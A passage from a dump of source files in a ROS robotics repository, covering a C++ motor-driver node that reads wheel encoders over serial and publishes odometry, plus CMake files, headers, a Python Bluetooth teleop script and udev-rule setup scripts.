sizeof(buf));\r\n }\r\n }\r\n\r\n if (!strcmp(str, \"encoder\"))\r\n {\r\n sprintf(write_buf, \"mp\\r\\n\");\r\n\r\n for (int i = 0; i < strlen(write_buf); i++)\r\n {\r\n unsigned char buf = (unsigned char)(write_buf[i]);\r\n write(serial_port, &buf, sizeof(buf));\r\n }\r\n }\r\n}\r\n\r\nvoid ntrex_can_fifo::chatterCallback(const geometry_msgs::Twist::ConstPtr &msg)\r\n{\r\n calculate_wheel_vel(msg->linear.x, msg->angular.z, &left_rpm, &rigth_rpm);\r\n\r\n linear_x = msg->linear.x;\r\n angular_ = msg->angular.z;\r\n\r\n MD_input(\"move\");\r\n}\r\n\r\nvoid ntrex_can_fifo::readStatus()\r\n{\r\n ros::Rate rate(20);\r\n\r\n while (1)\r\n {\r\n MD_input(\"encoder\");\r\n\r\n current_time = ros::Time::now();\r\n\r\n int i = 0;\r\n char parsing[3][20];\r\n double dt = (current_time - last_time).toSec();\r\n\r\n int nbytes = read(serial_port, &read_buf, sizeof(read_buf));\r\n\r\n if (dt > 10)\r\n {\r\n dt = 0.2;\r\n }\r\n\r\n if (nbytes > 0)\r\n {\r\n char *ptr = strtok(read_buf + 4, \",\");\r\n\r\n i = 0;\r\n\r\n while (ptr != NULL)\r\n {\r\n strcpy(parsing[i++], ptr);\r\n ptr = strtok(NULL, \",\");\r\n }\r\n\r\n left_encoder = atoi(parsing[0]);\r\n right_encoder = atoi(parsing[1]);\r\n\r\n delta_left = (left_encoder - left_encoder_prev) * -1;\r\n delta_right = right_encoder - right_encoder_prev;\r\n\r\n if (abs(delta_left) < 12000 && abs(delta_right) < 12000)\r\n {\r\n delta_s = (delta_left + delta_right) / 2.0 / pulse_per_distance;\r\n delta_th = ((delta_right - delta_left) / wheel_to_wheel_d / pulse_per_distance);\r\n delta_x = (delta_s * cos(th + delta_th / 2.0));\r\n delta_y = (delta_s * sin(th + delta_th / 2.0));\r\n }\r\n\r\n x -= delta_x;\r\n y -= delta_y;\r\n th += delta_th;\r\n }\r\n 
geometry_msgs::Quaternion Quaternion = tf::createQuaternionMsgFromYaw(th);\r\n \r\n transform.setOrigin( tf::Vector3(x, y,0));\r\n transform.setRotation(tf::Quaternion(Quaternion.x,Quaternion.y,Quaternion.z,Quaternion.w));\r\n\r\n odom_broadcaster.sendTransform(tf::StampedTransform(transform, ros::Time::now(), \"odom\", \"base_footprint\"));\r\n\r\n nav_msgs::Odometry odom;\r\n\r\n odom.header.stamp = current_time;\r\n odom.header.frame_id = \"odom\";\r\n\r\n odom.pose.pose.position.x = x;\r\n odom.pose.pose.position.y = y;\r\n odom.pose.pose.position.z = 0.0;\r\n odom.pose.pose.orientation = Quaternion;\r\n\r\n odom.child_frame_id = \"base_footprint\";\r\n odom.twist.twist.linear.x = linear_x;\r\n odom.twist.twist.linear.y = 0;\r\n odom.twist.twist.angular.z = angular_;\r\n\r\n chatter_pub.publish(odom);\r\n left_encoder_prev = left_encoder;\r\n right_encoder_prev = right_encoder;\r\n\r\n rate.sleep();\r\n last_time = current_time;\r\n }\r\n}\r\n\r\nvoid ntrex_can_fifo::run()\r\n{\r\n ros::Rate rate(1000);\r\n ros::spin();\r\n\r\n while (ros::ok())\r\n {\r\n rate.sleep();\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n ros::init(argc, argv, \"stella_mw_driver_node\");\r\n \r\n serial_port = open(\"/dev/MW\", O_RDWR);\r\n\r\n struct termios tty;\r\n\r\n if (tcgetattr(serial_port, &tty) != 0)\r\n {\r\n printf(\"Error %i from tcgetattr: %s\\n\", errno, strerror(errno));\r\n return 1;\r\n }\r\n\r\n tty.c_cflag &= ~PARENB;\r\n tty.c_cflag &= ~CSTOPB;\r\n tty.c_cflag &= ~CSIZE;\r\n tty.c_cflag |= CS8;\r\n tty.c_cflag &= ~CRTSCTS;\r\n tty.c_cflag |= CREAD | CLOCAL;\r\n\r\n tty.c_lflag &= ~ICANON;\r\n tty.c_lflag &= ~ECHO;\r\n tty.c_lflag &= ~ECHOE;\r\n tty.c_lflag &= ~ECHONL;\r\n tty.c_lflag &= ~ISIG;\r\n tty.c_iflag &= ~(IXON | IXOFF | IXANY);\r\n tty.c_iflag &= ~(IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL);\r\n\r\n tty.c_oflag &= ~OPOST;\r\n tty.c_oflag &= ~ONLCR;\r\n\r\n tty.c_cc[VTIME] = 10;\r\n tty.c_cc[VMIN] = 0;\r\n\r\n cfsetispeed(&tty, B115200);\r\n cfsetospeed(&tty, B115200);\r\n\r\n if (tcsetattr(serial_port, TCSANOW, &tty) != 0)\r\n {\r\n printf(\"Error %i from tcsetattr: %s\\n\", errno, strerror(errno));\r\n return 1;\r\n }\r\n\r\n ntrex_can_fifo node;\r\n\r\n node.run();\r\n\r\n return 0;\r\n}\r\n\r\n" }, { "alpha_fraction": 0.5936952829360962, "alphanum_fraction": 0.6077057719230652, "avg_line_length": 15.709677696228027, "blob_id": "4cd70e34e508bc05241a3f0914e27b6213a155e8", "content_id": "c485e7872a69be18e9f36dde7688a3b8ba190cfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 571, "license_type": "no_license", "max_line_length": 50, "num_lines": 31, "path": "/stella/ydlidar_ros/sdk/CMakeLists.txt", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "\r\nadd_definitions(-std=c++11) # Use C++11\r\ninclude_directories(include)\r\ninclude_directories(src)\r\n\r\nIF (WIN32)\r\nFILE(GLOB SDK_SRC \r\n \"src/*.cpp\"\r\n \"src/*.h\"\r\n \"src/impl/windows/*.cpp\"\r\n \"src/impl/windows/*.h\"\r\n)\r\n\t\r\nELSE()\r\nFILE(GLOB SDK_SRC \r\n \"src/*.cpp\"\r\n \"src/*.h\"\r\n \"src/impl/unix/*.cpp\"\r\n \"src/impl/unix/*.h\"\r\n)\r\n\r\n\t\r\nENDIF()\r\n\r\nadd_subdirectory(samples)\r\n\r\nadd_library(ydlidar_driver SHARED ${SDK_SRC})\r\nset(LIBRARY_OUTPUT_PATH ${PROJECT_SOURCE_DIR}/lib)\r\nIF (WIN32)\r\nELSE()\r\ntarget_link_libraries(ydlidar_driver rt pthread)\r\nENDIF() \r\n" }, { "alpha_fraction": 0.4938271641731262, "alphanum_fraction": 0.5102880597114563, "avg_line_length": 
9.380952835083008, "blob_id": "959b29fc41bb4abaa2feb774cdbd2f6a51b8fee9", "content_id": "4757de28217686607a008a5b2243f518eb092a70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 243, "license_type": "no_license", "max_line_length": 26, "num_lines": 21, "path": "/stella/stella_ahrs/src/SerialTypedf.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#define BIN_PACKET_LEN\t\t13\r\n\r\nstruct SerialMessage\r\n{\r\n int length;\r\n long ID;\r\n char data[8];\r\n};\r\n\r\n\r\nstruct Usb2Packet\r\n{\r\n double time_recv;\r\n union \r\n {\r\n SerialMessage msg;\r\n };\r\n \r\n};\r\n\r\n\r\n" }, { "alpha_fraction": 0.607922375202179, "alphanum_fraction": 0.6160064935684204, "avg_line_length": 28.924999237060547, "blob_id": "5b3324406162cf5b16771d0954b660d955bb4828", "content_id": "45cbf6022b98fd182b6f3cd2ade3a2b851326cc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1237, "license_type": "no_license", "max_line_length": 80, "num_lines": 40, "path": "/stella_slam/include/stella_slam/flat_world_imu_node.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "/*******************************************************************************\r\n* Copyright 2018 ROBOTIS CO., LTD.\r\n*\r\n* Licensed under the Apache License, Version 2.0 (the \"License\");\r\n* you may not use this file except in compliance with the License.\r\n* You may obtain a copy of the License at\r\n*\r\n* http://www.apache.org/licenses/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing, software\r\n* distributed under the License is distributed on an \"AS IS\" BASIS,\r\n* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n* See the License for the specific language governing permissions and\r\n* limitations under the License.\r\n*******************************************************************************/\r\n\r\n#ifndef FLAT_WORLD_IMU_NODE_H_\r\n#define FLAT_WORLD_IMU_NODE_H_\r\n\r\n#include <ros/ros.h>\r\n#include <sensor_msgs/Imu.h>\r\n\r\n#define GRAVITY 9.8\r\n\r\nclass FlatWorldImuNode\r\n{\r\n public:\r\n FlatWorldImuNode();\r\n ~FlatWorldImuNode();\r\n bool init();\r\n\r\n private:\r\n ros::NodeHandle nh_;\r\n ros::Time last_published_time_;\r\n ros::Publisher publisher_;\r\n ros::Subscriber subscriber_;\r\n void msgCallback(const sensor_msgs::ImuConstPtr imu_in);\r\n};\r\n\r\n#endif // FLAT_WORLD_IMU_NODE_H_\r\n" }, { "alpha_fraction": 0.6143572330474854, "alphanum_fraction": 0.6260433793067932, "avg_line_length": 15.323529243469238, "blob_id": "1e5e47f178f0b642548fc10709caf22e296fd4e2", "content_id": "573d671b9c511f8ae891e869b4be614172229c46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 599, "license_type": "no_license", "max_line_length": 66, "num_lines": 34, "path": "/stella/stella_ahrs/src/UsbPacket.hpp", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#include <pthread.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n\r\n\r\n#include \"SerialCOM.hpp\"\r\n#include \"SerialTypedf.hpp\"\r\n\r\n#define STX 0x02\r\n#define ETX 0x03\r\n\r\nclass SerialCom;\r\n\r\nclass UsbPacket\r\n{\r\nprivate:\r\n \r\npublic:\r\n UsbPacket();\r\n ~UsbPacket();\r\n \r\n int _RecvPacket(char *packet, int length);\r\n bool RecvPacket(Usb2Packet &pkt);\r\n bool SendPacket(void);\r\n char checkSum(char 
*packet, int start_length, int end_length);\r\n int FindMove(char *packet, int length, char stx);\r\n \r\n\r\nprotected:\r\n SerialCOM* _bus;\r\n};\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.7300000190734863, "avg_line_length": 40.66666793823242, "blob_id": "b509bdc6d8d4ed9a3ac49d4f0c9fc4ab2a6696d0", "content_id": "000f78022d949ce675ec640e3dbd8fc5265c402d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 500, "license_type": "no_license", "max_line_length": 141, "num_lines": 12, "path": "/stella_bringup/create_udev_rules.sh", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"remap the devices serial port(ttyUSBX, ttySX) to ydlidar, AHRS, Motordriver, Bluetooth\"\necho \"devices usb connection as /dev/YDLIDAR, /dev/AHRS, /dev/MW, /dev/BT , check it using the command : ls -l /dev|grep -e ttyUSB -e ttyS0\"\necho \"start copy stella.rules to /etc/udev/rules.d/\"\necho \"`rospack find stella_bringup`/stella.rules\"\nsudo cp `rospack find stella_bringup`/stella.rules /etc/udev/rules.d\necho \" \"\necho \"Restarting udev\"\necho \"\"\nsudo udevadm trigger\necho \"finish \"\n" }, { "alpha_fraction": 0.5539963245391846, "alphanum_fraction": 0.5838926434516907, "avg_line_length": 22.08450698852539, "blob_id": "8ca88128724f18865d2da4c32a72751b800c1d24", "content_id": "a81034019e024ec9c456f4fa61ec04bce34afa03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 55, "num_lines": 71, "path": "/stella_teleop_bluetooth/src/stella_teleop_bluetooth.py", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\nimport serial\nimport time\nimport rospy\nfrom geometry_msgs.msg import Twist\n\nif __name__==\"__main__\":\n\tserial_port = serial.Serial(\n\t\tport=\"/dev/BT\",\n \t\tbaudrate=9600,\n \t\tbytesize=serial.EIGHTBITS,\n \t\tparity=serial.PARITY_NONE,\n \t\tstopbits=serial.STOPBITS_ONE,\n\t)\n\n\t# Wait a second to let the port initialize\n\ttime.sleep(1)\n\t\n\trospy.init_node('stella_teleop_bluetooth_node')\n\tpub = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n\trate = rospy.Rate(10)\n\ttarget_linear_vel = 0.0\n\ttarget_angular_vel = 0.0\n\n\ttry:\n \t\twhile True:\n \t\tif serial_port.inWaiting() > 0:\n \t\t\tdata = serial_port.readline()\n \t\t\ta = data[0:5]\n \t\t\ta = str(a)\n\t\t\t\ta = a.split(\"/\")\n\t\t\t\t\n\t\t\t\tif a[0] == 'F':\n\t\t\t\t\ttarget_linear_vel = float(a[1]) * 1\n\t\t\t\telif a[0] == 'B':\n\t\t\t\t\ttarget_linear_vel = float(a[1]) * -1\n\t\t\t\telif a[0] == 'L':\n\t\t\t\t\ttarget_angular_vel = float(a[1]) * 1.57\n\t\t\t\telif a[0] == 'R':\n\t\t\t\t\ttarget_angular_vel = float(a[1]) * -1.57\n\t\t\t\telif a[0] == 'S':\n\t\t\t\t\ttarget_linear_vel = 0.0\n\t\t\t\t\ttarget_angular_vel = 0.0\n\t\t\t\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t\ttarget_linear_vel = 0.0\n\t\t\t\ttarget_angular_vel = 0.0\t\t\n\t\t\n\t\t\ttwist = Twist()\n\t\t\t\n\t\t\ttwist.linear.x = target_linear_vel\n\t\t\ttwist.linear.y = 0.0\n\t\t\ttwist.linear.z = 0.0\n\n\t\t\ttwist.angular.x = 0.0\n\t\t\ttwist.angular.y = 0.0\n\t\t\ttwist.angular.z = target_angular_vel\n\t\t\t\n\n\t\t\tpub.publish(twist)\n\t\t\trate.sleep()\n\n\texcept KeyboardInterrupt:\n \t\tprint(\"Exiting Program\")\n\texcept Exception as exception_error:\n \t\tprint(\"Error occurred. 
Exiting Program\")\n \t\tprint(\"Error: \" + str(exception_error))\n\tfinally:\n \t\tserial_port.close()\n \tpass\n" }, { "alpha_fraction": 0.7003257274627686, "alphanum_fraction": 0.7133550643920898, "avg_line_length": 15.941176414489746, "blob_id": "a1622f95720a0767db10981f4cad432d0bdf5057", "content_id": "e60a03523cb308dfd092e491429c793e94ebf84e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 307, "license_type": "no_license", "max_line_length": 41, "num_lines": 17, "path": "/stella/ydlidar_ros/sdk/include/utils.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "\r\n#pragma once\r\n\r\n#ifdef WIN32\r\n#ifdef ydlidar_EXPORTS\r\n#define YDLIDAR_API __declspec(dllexport)\r\n#else\r\n#ifdef ydlidarStatic_EXPORTS\r\n#define YDLIDAR_API \r\n#else\r\n\r\n#define YDLIDAR_API __declspec(dllimport)\r\n#endif // YDLIDAR_STATIC_EXPORTS\r\n#endif\r\n\r\n#else \r\n#define YDLIDAR_API \r\n#endif // ifdef WIN32\r\n" }, { "alpha_fraction": 0.6129793524742126, "alphanum_fraction": 0.6389380693435669, "avg_line_length": 20.600000381469727, "blob_id": "3b725f393f409533393c20c6f76e8888ed4d3665", "content_id": "fa204e3ccb050c1f7db71904ee2dcfe5631cd46f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1695, "license_type": "no_license", "max_line_length": 112, "num_lines": 75, "path": "/stella/stella_md/src/listener.h", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#include <thread>\r\n#include <ros/ros.h>\r\n#include <fcntl.h> // Contains file controls like O_RDWR\r\n#include <errno.h> // Error integer and strerror() function\r\n#include <termios.h> // Contains POSIX terminal control definitions\r\n#include <unistd.h> // write(), read(), close()\r\n#include <sensor_msgs/Imu.h>\r\n#include <vector>\r\n#include <sstream>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <tf2/LinearMath/Quaternion.h>\r\n#include <math.h>\r\n#include <geometry_msgs/Twist.h>\r\n#include <string.h>\r\n#include <nav_msgs/Odometry.h>\r\n#include <tf/transform_broadcaster.h>\r\n\r\n//\r\n\r\n\r\n\r\n#define DEG2RAD( a ) ( (a) * (M_PI/180.0f) )\r\n#define COS(a) cos(DEG2RAD(a))\r\n#define SIN(a) sin(DEG2RAD(a))\r\n\r\n\r\nusing namespace std;\r\n\r\nfloat imu_data[8] = {0,};\r\nchar read_buf [256];\r\nint serial_port;\r\n\r\nchar write_buf [256];\r\nchar *sArr[2] = {0,};\r\n\r\n\r\nsensor_msgs::Imu imu;\r\n\r\n\r\nros::Time current_time, last_time;\r\n\r\nfloat left_rpm = 0, rigth_rpm = 0;\r\nint left_encoder = 0, right_encoder = 0,delta_left = 0,delta_right = 0,left_encoder_prev=0,right_encoder_prev=0;\r\n\r\nfloat linear_x = 0.0, angular_ = 0.0;\r\n\r\ndouble delta_th=0.0,delta_s=0.0,delta_x=0.0,delta_y=0.0,x=0.0,y=0.0,th=0.0;\r\n\r\nclass ntrex_can_fifo\r\n{\r\n private:\r\n ros::Publisher chatter_pub;\r\n ros::Subscriber sub;\r\n\r\n ros::NodeHandle n;\r\n\r\n std::thread* thread_read_AHRS;\r\n std::thread* thread_pub_odm;\r\n\r\n tf::TransformBroadcaster odom_broadcaster;\r\n tf::Transform transform;\r\n \r\n public:\r\n\r\n ~ntrex_can_fifo();\r\n ntrex_can_fifo();\r\n\r\n void readStatus();\r\n void writepub();\r\n void chatterCallback(const geometry_msgs::Twist::ConstPtr& msg);\r\n void MD_input(char* str);\r\n\r\n void run();\r\n};\r\n" }, { "alpha_fraction": 0.7377622127532959, "alphanum_fraction": 0.7377622127532959, "avg_line_length": 27.600000381469727, "blob_id": "e0a5108e8f225d44723ad728003f975127640921", "content_id": "8337d0b43e2957f3fe39b70f5516e3a50ba69831", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 286, "license_type": "no_license", "max_line_length": 100, "num_lines": 10, "path": "/stella_bringup/delete_udev_rules.sh", "repo_name": "ntrexlab/STELLA", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"delete remap the devices serial port(ttyUSBX,ttySX) to ydlidar, AHRS, Motordriver, Bluetooth\"\necho \"sudo rm /etc/udev/rules.d/stella.rules\"\nsudo rm /etc/udev/rules.d/stella.rules\necho \" \"\necho \"Restarting udev\"\necho \"\"\nsudo udevadm trigger\necho \"finish delete\"\n" } ]
20
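For readers of `mobilerobot.h`/`mobilerobot.cpp` in the record above, the wheel-speed math is short enough to restate. The Python sketch below mirrors `calculate_wheel_vel` — constants copied from the header, and the trailing sign flip matches the repo's motor orientation — and checks the pure-rotation case:

WHEEL_TO_WHEEL_D = 0.337         # wheel-to-wheel distance [m]
MOTOR_SCALE_CONST = 106.1032954  # m/s to rpm

def calculate_wheel_vel(linear, angular):
    # v_wheel = v +/- (d/2) * w, then scaled to rpm and sign-flipped.
    left = (linear + WHEEL_TO_WHEEL_D / 2.0 * angular) * MOTOR_SCALE_CONST
    right = (linear - WHEEL_TO_WHEEL_D / 2.0 * angular) * MOTOR_SCALE_CONST
    return -left, -right

left_rpm, right_rpm = calculate_wheel_vel(0.0, 1.0)  # spin in place
assert abs(left_rpm + right_rpm) < 1e-9              # equal and opposite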
DapperDan2520/MyWay2015
https://github.com/DapperDan2520/MyWay2015
22dce69744d439f9335fcd7373e45003e5fe2810
1760ed2bc7f934ed97c550ddff6c31563c078f20
8d4eed992e5c2efc1cf2e938fc165bc9898d4db4
refs/heads/master
2016-09-10T19:00:27.426117
2015-09-24T02:07:14
2015-09-24T02:07:14
34,036,502
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6828793883323669, "alphanum_fraction": 0.6828793883323669, "avg_line_length": 17.39285659790039, "blob_id": "e40528a0a242fe085146e3610e740dafd4bcda35", "content_id": "51dbf33c6bab9719bb16c1509ced19ec63127213", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 90, "num_lines": 28, "path": "/routes.py", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask.ext.login import LoginManager, UserMixin, current_user, login_user, logout_user\n\napp = Flask(__name__)\n\nimport db\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n'''class UserNotFoundError(Exception):\n\tpass\n\nclass User(UserMixin):\n\t\n\tdef __init__(self, id):\n\t\tif not id in self.\n'''\n\[email protected]('/')\ndef main():\n\treturn render_template('index.html')\n\[email protected]('/signup_check', methods=['POST']):\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)" }, { "alpha_fraction": 0.804651141166687, "alphanum_fraction": 0.804651141166687, "avg_line_length": 14.428571701049805, "blob_id": "d06ec7f982d2a4ab042f75c6150461a44eaf777f", "content_id": "3262982962a187fdb4274b98f47c836c78003df3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 215, "license_type": "no_license", "max_line_length": 70, "num_lines": 14, "path": "/notes.txt", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "DB= mysql\nFramework=Flask (python)\nAuthentication strategy=FB Login\n\nDB Setup:\n\nFirst_name\nLast_name\nEmail\nZip_Code\n\nMake sure we are salting passwords and we are hashing them using mysql\n\n-finish the authentication" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 36.75, "blob_id": "ee89da98d1d3c4edb5a40b6859679d34cfd38bac", "content_id": "72c42c51c6375249bba2004aac834b193d8d4d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 150, "license_type": "no_license", "max_line_length": 90, "num_lines": 4, "path": "/auth.py", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "from flask.ext.login import LoginManager, UserMixin, current_user, login_user, logout_user\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)" }, { "alpha_fraction": 0.6633166074752808, "alphanum_fraction": 0.713567852973938, "avg_line_length": 25.600000381469727, "blob_id": "860470d56e648852aa86c3aed6277c8a5c193d71", "content_id": "1dddd0f66af7e27e50a99b2dd7a7d7c71a65472f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 56, "num_lines": 15, "path": "/_auth.py", "repo_name": "DapperDan2520/MyWay2015", "src_encoding": "UTF-8", "text": "from flask_oauth import OAuth\n\noauth = OAuth()\nfb_app_id = 1720905058133337\nfb_app_secret = \"50ba8c6da2dd383352131cd4b5fc4cf1\"\n\nfacebook = oauth.remote_app('facebook',\n\t\tbase_url='localhost:5000',\n\t\trequest_token_url=None,\n\t\taccess_token_url='/oauth/access_token',\n\t\tauthorize_url='https://www.facebook.com/dialog/oauth',\n\t\tconsumer_key=fb_app_id,\n\t\tconsumer_secret=fb_app_secret,\n\t\trequest_token_params={'scope': 'email'}\n\t)" } ]
4
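The routes.py above leaves the /signup_check handler unwritten, and notes.txt asks for salted, hashed passwords. Below is a minimal sketch of how that handler could look; the form field names, the validation, and the storage step are illustrative assumptions, not the author's implementation.

from flask import Flask, request
from werkzeug.security import generate_password_hash

app = Flask(__name__)

@app.route('/signup_check', methods=['POST'])
def signup_check():
    # hypothetical field names; the repo never defines the signup form
    email = request.form.get('email', '')
    password = request.form.get('password', '')
    if not email or not password:
        return 'missing fields', 400
    # generate_password_hash salts automatically, so only a salted hash
    # (never the plaintext) would reach the MySQL users table
    pw_hash = generate_password_hash(password)
    # storing (email, pw_hash) via the repo's db module would go here
    return 'ok', 200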
babette-wh/Developa
https://github.com/babette-wh/Developa
e78379e35f7f4b76d1bb487769f3ac6da3808883
d82afa64ef7b2d92927240b8a8f9c293989931ba
efdf6f670ef4a40267a6d8b06b126467dc7126c7
refs/heads/master
2023-04-17T15:23:51.435648
2021-04-30T08:28:54
2021-04-30T08:28:54
294,772,691
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6005737781524658, "alphanum_fraction": 0.6160211563110352, "avg_line_length": 41.581729888916016, "blob_id": "531f2efcdfaabb848958b66f49a3efd25c3b373c", "content_id": "125d5df58107d9e18cc80888aa9728b3650e2e1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9063, "license_type": "no_license", "max_line_length": 207, "num_lines": 208, "path": "/main.py", "repo_name": "babette-wh/Developa", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 18 01:29:10 2021\r\n\r\n@author: Malin Spørck\r\n\"\"\"\r\n\r\nimport bz2\r\nimport sqlite3\r\nimport datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\n\r\ndef print_explanation():\r\n print(\r\n''' \r\n------------------------------------------------------------------------\r\nThis application opens file1 with Traffic Data arranged in the following sequence:\r\nTime, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes\r\n \r\nIt connects to an sqlite database, inserts data from the traffic data file into the database in the table \"Network_Traffic\"\r\n \r\nThe application also runs queries in the database to analyze trafficdata and change status in entries of traffic that looks suspicious, based on conditions set in the database table \"Criteria\"\r\n \r\nMenu:\r\n \r\n 1: Read data from file and store data in database\r\n - Input parameter: number of lines to read from file (100000 elements is recomended)\r\n 2: Run Check For Suspicious Traffic \r\n 3: Create report over suspicious data and store to Report_dd.month-yyyy_hh.mm.pdf \r\n 4: Create charts over suspicious data and store them as .png images \r\n 0: Exit\r\n------------------------------------------------------------------------\r\n''')\r\n \r\n\"\"\"\r\nChecks for suspicious traffic based on criterias described in Criteria SQL table\r\nToDo: Must create checkers so that we do not register duplicates in the database, before calling Readfile\r\n\"\"\"\r\ndef RunCheckForSuspiciousTraffic():\r\n print(\"\\nRuning check(s) for suspicious traffic...\")\r\n try:\r\n cursor = conn.cursor() \r\n criterias = []\r\n for row in cursor.execute('SELECT SQL from Criteria'):\r\n \"\"\"Stripping down sql string for unwanted characters\"\"\"\r\n SQL_Criteria = str(row).replace('(\"',\"\").replace(')\",',\"\")\r\n criterias.append(SQL_Criteria)\r\n \r\n for elements in criterias:\r\n print(\"sql \" + elements) \r\n cursor.execute(elements) \r\n conn.commit() \r\n \r\n except Exception as err:\r\n print ('Query Failed: %s\\nError: %s' % (\"SQL\", str(err)))\r\n \r\n finally:\r\n cursor.close()\r\n \"\"\" print ('Closing the connection')\"\"\"\r\n \r\n\"\"\"\r\nNewItem(Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes):\r\nThis function is used to store data from the input file to SQLITE database. \r\n\"\"\" \r\ndef NewItem(Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes):\r\n try:\r\n cursor = conn.cursor()\r\n cursor.execute('''INSERT INTO Network_Traffic (Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes) \r\n VALUES (?,?,?,?,?,?,?,?,?,?,?) 
;''',(Time, Duration, SrcDevice, DstDevice, Protocol, SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes)) \r\n    except Exception as err:\r\n        print ('Query Failed: %s\\nError: %s' % (\"SQL\", str(err)))\r\n    else:\r\n        NewId = cursor.execute('SELECT last_insert_rowid();').fetchone()[0]\r\n        \"\"\"print('New record inserted with id ' + str(NewId))\"\"\"\r\n    finally:\r\n        cursor.close()\r\n        \"\"\" print ('Closing the connection')\"\"\"\r\n\"\"\"\r\nReadFile(filename, numb_lines):\r\nReads the .bz2 file and stores items in the SQLite database by calling the function \r\nNewItem(...) with the parameters from the input file\r\nWhen the file has been read and the data has been added to the database, \r\nthe function exits after committing the changes to the database \r\n\r\nCode created with inspiration from\r\nAnon., 2021. Reading first lines of bz2 files in python - Stack Overflow. [online] Available at:\r\n<https://stackoverflow.com/questions/37172679/reading-first-lines-of-bz2-files-in-python> \r\n[Accessed 30 April 2021].\r\n\r\nObtaining the bz2 file we used as dataset\r\nAnon., 2021. Unified Host and Network Data Set - Cyber Security Research. [online] Available at:\r\n<https://csr.lanl.gov/data/2017/> \r\n[Accessed 30 April 2021].\r\n\"\"\" \r\ndef ReadFile(filename, numb_lines): \r\n    print(\"Reading file...\") \r\n    source_file = bz2.open(filename, \"r\")\r\n    count = 0\r\n    \r\n    for line in source_file:\r\n        \r\n        if(count < int(numb_lines)):\r\n            x = str(line).replace(\"b'\",\"\")\r\n            y = str(x).replace(\"\\\\n\",\"\")\r\n            yy = str(y).replace(\"Port\",\"\")\r\n            zz = str(yy).replace(\"'\",\"\")\r\n            z = str(zz).split(\",\") \r\n            NewItem(z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8], z[9], z[10])\r\n        else: \r\n            break\r\n        count += 1\r\n        read_count = int(numb_lines)/10\r\n        if(count%read_count == 1 and count > 1):\r\n            print(str(int(count/read_count)*10) + \"%\")\r\n    \r\n    conn.commit()\r\n    print(\"Data stored in database\")\r\n\"\"\"\r\nCreateReport(sql):\r\nUsed to create a report and store the result in a .pdf file (Report_dd.month-yyyy_hh.mm.pdf )\r\nCode created with inspiration from\r\nAnon., 2021. How do I plot only a table in Matplotlib? - Stack Overflow. [online] Available at: \r\n<https://stackoverflow.com/questions/32137396/how-do-i-plot-only-a-table-in-matplotlib> \r\n[Accessed 30 April 2021].\r\n\"\"\" 